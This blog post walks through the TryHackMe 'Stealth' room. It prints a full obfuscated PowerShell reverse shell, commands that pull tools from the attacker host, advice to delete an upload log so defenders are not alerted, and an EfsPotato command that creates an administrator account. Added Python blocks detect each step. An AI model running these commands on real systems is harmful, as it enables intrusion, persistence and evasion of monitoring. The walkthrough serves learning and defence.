Stealth || TryHackMe Walkthrough

Nihir Zala
6 min read · Dec 1, 2023


Running Nmap —

┌──(kali㉿kali)-[/home/thm/stealth]
└─$ sudo nmap -T4 --min-rate 1000 -sC -sV -p- -oN nmap_report 10.10.130.54
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:27 EST
Nmap scan report for 10.10.130.54
Host is up (0.17s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2023-07-28T19:06:15
|_Not valid after: 2024-01-27T19:06:15
|_ssl-date: 2023-11-28T16:32:19+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
|_http-title: PowerShell Script Analyser
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open unknown
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-11-28T16:31:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 312.84 seconds

Visiting https://10.10.165.36:8443/

Uploading the reverse shell file —

martinsohn/PowerShell-reverse-shell: powershell-reverse-shell.ps1 (github.com)

Note — Start listening on port 13337 to gain a reverse shell

Found a flag at C:\Users\evader\Desktop —

The file.ps1 file in the C:\Users\evader\Documents\Task folder indicates that there is a log file present in C:\xampp\htdocs\uploads.

SHELL> dir
    Directory: C:\xampp\htdocs\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/1/2023 5:10 PM 132 hello.ps1
-a---- 8/17/2023 4:58 AM 0 index.php
-a---- 11/29/2023 4:55 AM 302 log.txt
-a---- 11/29/2023 4:55 AM 1462 rev.ps1
-a---- 9/4/2023 3:18 PM 771 vulnerable.ps1

Remove the log.txt file immediately after uploading the reverse shell file so that the blue team members won’t be alerted.

Inspecting log.txt & vulnerable.ps1 —

SHELL> type log.txt
exe
ps1
ps1
ps1
ps1
ps1
ps1
ps1
ps1
--------------------SNIPPED---------------------
SHELL> type vulnerable.ps1
Set-Alias -Name K -Value Out-String
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.10.129.75',1234);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
$B = ([text.encoding]::UTF8).GetBytes("(c) Microsoft Corporation. All rights reserved.`n`n")
----------------------------------SNIPPED----------------------------------------

Steps to gain User Flag

  1. Copy the vulnerable.ps1 file and change the IP and the port as required
  2. Upload the modified reverse shell
  3. Delete the log.txt file in the Directory: C:\xampp\htdocs\uploads
###The vulnerable.ps1 file is a reverse shell, modifying the reverse shell file
###Using this as a reverse shell (sample.ps1)
Set-Alias -Name K -Value Out-String
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.11.50.160',1234);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
$B = ([text.encoding]::UTF8).GetBytes("(c) Microsoft Corporation. All rights reserved.`n`n")
$replace.Write($B,0,$B.Length)
$B = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$replace.Write($B,0,$B.Length)
[byte[]]$int = 0..(10000+55535)|%{0};
while(($i = $replace.Read($int, 0, $int.Length)) -ne 0){;
$ROM = [text.encoding]::ASCII.GetString($int,0, $i);
$I = (nothingHere $ROM 2>&1 | K );
$I2 = $I + (pwd).Path + '> ';
$U = [text.encoding]::ASCII.GetBytes($I2);
$replace.Write($U,0,$U.Length);
$replace.Flush()};
$BT.Close()
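The upload log (log.txt) only records file extensions, and it sits in a directory the web server account can delete, which is exactly why removing it works in this room. A control that inspects the content of uploaded .ps1 files is harder to sidestep. The block below is an added example written for this walkthrough, not code from the room, from martinsohn/PowerShell-reverse-shell, or from the PowerShell Script Analyser app: it strips the no-op backticks that split "System.Net.Sockets.TCPClient" in vulnerable.ps1 and sample.ps1, then flags the socket, stream and Invoke-Expression indicators, including the Set-Alias trick that hides iex behind a harmless-looking name. Both input scripts are constructed; the first mirrors the lines quoted above with the attacker address replaced by a placeholder.

```python
import re

# Constructed sample: the opening of the room's vulnerable.ps1 as quoted in this
# walkthrough, with the attacker address replaced by a placeholder.
SAMPLE_SCRIPT = r'''Set-Alias -Name K -Value Out-String
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('ATTACKER_IP',1234);
$replace = $BT.GetStream();
$B = ([text.encoding]::UTF8).GetBytes("(c) Microsoft Corporation. All rights reserved.`n`n")
$I = (nothingHere $ROM 2>&1 | K );
'''

# Constructed benign upload for comparison: uses an alias and Out-String but no network or eval.
BENIGN_SCRIPT = r'''Set-Alias -Name K -Value Out-String
Get-ChildItem C:\xampp\htdocs\uploads | K
'''

# A backtick before one of these characters is a real PowerShell escape (`n newline,
# `t tab, ...) and must be kept; a backtick before any other character is a no-op
# whose only purpose is to split a keyword such as TCPClient for naive greps.
_NOOP_BACKTICK = re.compile(r"`(?![ntr0abfveu`\"$])")

def deobfuscate(script: str) -> str:
    """Remove no-op backticks so split identifiers read as the runtime sees them."""
    return _NOOP_BACKTICK.sub("", script)

# Substrings that together characterise a PowerShell TCP reverse shell.
INDICATORS = {
    "TCPClient": "opens an outbound TCP socket",
    "GetStream": "reads/writes a raw network stream",
    "Invoke-Expression": "evaluates received text as code",
}

_IEX_ALIAS = re.compile(
    r"Set-Alias\s+-Name\s+(\S+)\s+-Value\s+(?:iex|Invoke-Expression)\b", re.IGNORECASE)

def scan_powershell(script: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    clean = deobfuscate(script)
    findings = []
    for token, why in INDICATORS.items():
        if re.search(re.escape(token), clean, re.IGNORECASE):
            findings.append(f"{token}: {why}")
    if re.search(r"\biex\b", clean, re.IGNORECASE):
        findings.append("iex: evaluates received text as code")
    # Aliasing Invoke-Expression hides it from keyword greps; report the alias
    # and count how many times it is invoked after being defined.
    for m in _IEX_ALIAS.finditer(clean):
        alias = m.group(1)
        uses = len(re.findall(r"(?<![\w-])" + re.escape(alias) + r"(?![\w-])", clean)) - 1
        findings.append(f"alias {alias} -> Invoke-Expression, invoked {uses} time(s)")
    return findings

if __name__ == "__main__":
    for name, text in (("vulnerable.ps1", SAMPLE_SCRIPT), ("benign.ps1", BENIGN_SCRIPT)):
        print(name, scan_powershell(text) or "clean")
```

The de-obfuscation step matters more than the keyword list: without it, "T`CPCl`ient" never matches "TCPClient", which is the whole point of the backticks in the room's script. A real deployment would also write its verdict somewhere the web server account cannot delete, unlike log.txt here.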

Uploading the reverse shell file —

Note — Start listening on port 1234 to get a new reverse shell on the target machine

Gained User Flag —

Uploading PrivescCheck.ps1 —

itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows (github.com)

C:\Users\evader\Documents> iwr -uri "http://10.11.50.160/PrivescCheck.ps1" -o PrivescCheck.ps1
#Executing the script
C:\Users\evader\Documents> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

The Xampp service is being run by the user: evader —

Checking evader’s privileges in the reverse shell session —

C:\Users\evader\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Uploading the p0wny shell to gain a shell through the Xampp service; the p0wny shell file can be uploaded to C:\xampp\htdocs since the service is run by the user evader.

flozz/p0wny-shell: Single-file PHP shell (github.com)

C:\Users\evader\Documents> cd C:\xampp\htdocs
C:\xampp\htdocs> iwr -uri "http://10.11.50.160/shell.php" -o shell.php
C:\xampp\htdocs>

Visit the URL: http://<ip>:8080/shell.php

Checking the privileges of the user in the p0wny shell —

The user has SeImpersonatePrivilege enabled; this can be leveraged for privilege escalation.
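Both the `whoami /priv` check in the reverse shell above and the same check in the p0wny shell come down to reading the token's privilege list and knowing which entries matter. The block below is an added Python example for this walkthrough, not code from the room or from PrivescCheck: it parses `whoami /priv` text and reports the privileges that PrivescCheck and similar audit tools treat as high risk. Both inputs are constructed; the first mirrors evader's output above, the second is a made-up token that carries SeImpersonatePrivilege, as the web-server account did in the p0wny shell session.

```python
import re

# Constructed copy of the `whoami /priv` output shown above for the evader session.
EVADER_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Constructed output for a service-style token that carries SeImpersonatePrivilege.
SERVICE_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""

# One privilege row: name, free-text description, then Enabled or Disabled.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

# Privileges that let a holder reach SYSTEM or bypass file ACLs. Holding one of
# these "Disabled" is not a mitigation: a process can re-enable any privilege
# that is present in its token.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate any client token (Potato family)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

def parse_privs(text: str) -> dict:
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def risky_privileges(text: str) -> list:
    """Return (name, state, reason) for every high-risk privilege present in the token."""
    return [(name, state, HIGH_RISK[name])
            for name, state in parse_privs(text).items() if name in HIGH_RISK]

if __name__ == "__main__":
    for label, text in (("evader", EVADER_PRIV), ("web server", SERVICE_PRIV)):
        hits = risky_privileges(text)
        print(label, "->", hits if hits else "no high-risk privileges")
```

The state column is the caveat worth remembering: a privilege listed as Disabled is still held by the token, so the hardening question is whether the web server's account holds SeImpersonatePrivilege at all, not whether it is currently enabled. Running Apache under a low-privilege local user that lacks it, rather than a service account that has it by default, closes the path used in the next step.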

Using EfsPotato for privilege escalation —

zcgonvh/EfsPotato: Exploit for EfsPotato (MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privilege escalation vulnerability) (github.com)

Transferring the file to the target machine —

Compiling the binary —

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618

Using the binary to run commands with elevated privileges —

.\efs.exe whoami
#Command to create a user and add it to the local Administrators group
.\efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add"

Adding user to the Administrators group —
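On the defensive side, the `net user ... /add && net localgroup administrators ... /add` pair above leaves two Security-log events seconds apart with the same SID: 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). The block below is an added Python example for this walkthrough, not part of the room or of EfsPotato, that correlates the two. The event records are constructed dictionaries that use the real field names of those events; every SID, timestamp and subject name in them is made up.

```python
from datetime import datetime, timedelta

LOCAL_ADMINS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

# Constructed Security-log records. Field names follow the 4720 (user created) and
# 4732 (member added to local group) event schemas; all values are made up.
EVENTS = [
    {"EventID": 4720, "Time": "2023-11-29T12:01:10", "SubjectUserName": "SYSTEM",
     "TargetUserName": "user", "TargetSid": "S-1-5-21-1111-2222-3333-1005"},
    {"EventID": 4732, "Time": "2023-11-29T12:01:11", "SubjectUserName": "SYSTEM",
     "TargetUserName": "Administrators", "TargetSid": LOCAL_ADMINS_SID,
     "MemberName": "-", "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    # An account created hours earlier and promoted later: outside the default window.
    {"EventID": 4720, "Time": "2023-11-29T08:00:00", "SubjectUserName": "Administrator",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1111-2222-3333-1006"},
    {"EventID": 4732, "Time": "2023-11-29T13:30:00", "SubjectUserName": "Administrator",
     "TargetUserName": "Administrators", "TargetSid": LOCAL_ADMINS_SID,
     "MemberName": "-", "MemberSid": "S-1-5-21-1111-2222-3333-1006"},
]

def find_create_then_admin(events, window=timedelta(minutes=5)):
    """Pair each 4720 with a later 4732 into BUILTIN Administrators for the same SID within window."""
    created = {}   # TargetSid -> (account name, creation time, who created it)
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], t, ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == LOCAL_ADMINS_SID:
            # 4732 identifies the new member by SID (MemberName is often "-"), so join on SID.
            hit = created.get(ev["MemberSid"])
            if hit and timedelta(0) <= t - hit[1] <= window:
                name, created_at, creator = hit
                alerts.append({
                    "account": name,
                    "created_by": creator,
                    "promoted_by": ev["SubjectUserName"],
                    "seconds_between": int((t - created_at).total_seconds()),
                })
    return alerts

if __name__ == "__main__":
    for a in find_create_then_admin(EVENTS):
        print(f"ALERT: {a['account']} created by {a['created_by']} and added to "
              f"Administrators by {a['promoted_by']} {a['seconds_between']}s later")
```

Joining on the SID rather than the account name is deliberate: the name in a 4732 event is frequently "-", and a name can be reused, whereas the SID issued at creation is unique. Widening the window trades a few more legitimate provisioning pairs for catching slower hands-on-keyboard activity.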

Using the new credentials to log in over RDP as 'user' —

Using Remmina —

Captured Root Flag —

Thank you for reading!


Written by Nihir Zala

Hi there, I'm Nihir Zala—a Laravel developer from Gujarat, India, with over 2.5 years of professional experience. I am also learning pentesting from THM and HTB.
